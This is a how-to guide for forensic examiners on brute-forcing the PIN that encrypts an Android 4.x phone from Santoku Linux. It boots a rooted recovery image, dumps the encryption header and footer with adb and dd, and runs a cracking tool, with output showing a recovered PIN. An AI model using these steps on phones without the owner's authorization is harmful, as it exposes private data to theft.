How Tos

HOWTO Brute Force Android Encryption on Santoku Linux


This HOWTO will guide you through the process of cracking the pin used to encrypt an Android device (Ice Cream Sandwich and Jelly Bean) using brute force on Santoku Linux Community edition.

Contents

What you will need:

  • Santoku – Alpha 0.3 (or later)
  • Android Brute Force Encryption tool (bundled)
  • A Samsung Galaxy Nexus or Galaxy S (The device must be Android version 4.0 or higher with an unlocked bootloader)
  • An Android recovery image that allows you root access

Put your phone in fastboot mode.

First, we need to put the phone in recovery mode so we can boot the custom recovery image. If your device already has a custom recovery image with root address installed, you can skip this step.

There’s and easy way to accomplish this (adb) and a more difficult one (Vulcan death grip). If you have a device with adb enabled, simply connect it to Santoku (make sure you pass it through if running in a VM), run an LXTerminal and issue this command:

adb reboot bootloader

 

Otherwise, you can use various keys combinations to access fastboot.

Nexus S

  1. Turn the device off
  2. Press and hold the volume up button
  3. Press and hold the power button

Galaxy Nexus

  1. Turn the device off
  2. Press and hold the both volume buttons
  3. Press the power button

After completing this step, you should see a screen like this (serial number blurred for security):

Top

Boot to a recovery image

Next, we’ll boot the device from a rooted recovery image. For this guide, we used Clockwork Mod but you can use any device compatible recovery image with root and adbd enabled. Note where you saved the recovery image. For this example, we placed the image in the Downloads directory.

From an LxTerminal, we’ll run fastboot and make sure we can communicate with the device:

cd /opt/santoku/fastboot
./fastboot-linux-i386 devices

 

You should see the device serial number as follows:

1234BD156E7890EC	fastboot

 

If you do not see this, make sure the device is connected and passed through if you are running in a VM. Also, for some devices, you may need to run fastboot as root if see the following:

????????????	fastboot

 

In that case, try the following:

sudo ./fastboot-linux-i386 devices

 

If this works, preface future fastboot commands with sudo as well.

Now that we’ve verified we can communicate with the device over fastboot, let’s boot using the recovery image:

./fastboot-linux-i386 boot ~/Downloads/recovery-clockwork-6.0.1.0-crespo4g.img

 

Which should reboot the device into your recovery image. The output to the terminal looks as follows:

downloading 'boot.img'... OKAY
booting... OKAY

Top

Pull the required header and footer files

Your devices should be sitting in recovery mode now. Next, we are going to pull the needed header and footer data so we can brute force the encryption pin. The location varies by device so choose the steps for your particular device type.

Nexus S
Header

adb shell dd if=/dev/block/mmcblk0p2 of=tmp_header bs=512 count=1
adb pull tmp_header ~/Desktop/tmp_header

 

Footer

adb shell mkdir /efs
adb shell mount -t yaffs2 /dev/block/mtdblock6 /efs
adb pull /efs/userdata_footer ~/Desktop/tmp_footer

 

Galaxy Nexus
Header

adb shell dd if=/dev/block/mmcblk0p12 of=tmp_header bs=512 count=1
adb pull tmp_header ~/Desktop/tmp_header

 

Footer

adb shell dd if=/dev/block/mmcblk0p13 of=tmp_footer
adb pull tmp_footer ~/Desktop/tmp_footer

Top

Run the Android Brute Force Encryption program:

We now have everything thing we need so we’ll run the Android Brute Force Encryption cracking program against the header and footer files. By default, we test 4-digit numeric passcodes but you can change the number of digits to test. To run the program, launch it under Santoku –> Device Forensics –> Android Brute Force Encryption. Then run it against the header and footer files:

bruteforce_stdcrypto ~/Desktop/tmp_header ~/Desktop/tmp_footer

 

The program will output information about the footer file and then brute force the password:

Defaulting max PIN digits to 4
Footer File    : /home/santoku/Desktop/tmp_footer
Magic          : 0xD0B5B1C4
Major Version  : 1
Minor Version  : 0
Footer Size    : 104 bytes
Flags          : 0x00000000
Key Size       : 128 bits
Failed Decrypts: 0
Crypto Type    : aes-cbc-essiv:sha256
Encrypted Key  : 0xE51861649D0005F874AD6CCAB6DF2C61
Salt           : 0xA163525990AC7A053E1E372914999BE8
----------------
Trying to Bruteforce Password... please wait
Trying: 0000
Trying: 0001
Trying: 0002
Trying: 0003

Trying: 6426
Trying: 6427
Trying: 6428
Found PIN!: 6428

 

This took just over 45 seconds while running Santoku in a VM. You can now use the passcode to boot the device and access the encrypted data.

Top

Contribute cycles

viaForensics released this code open source to the community at our DefCon 20 talk. If you have time and skills, there’s plenty more to do such as:

  • Expanding beyond numeric passcodes
  • Decrypt the raw file system
  • Speed optimizations

The code is hosted on the Santoku Linux GitHub account.
Top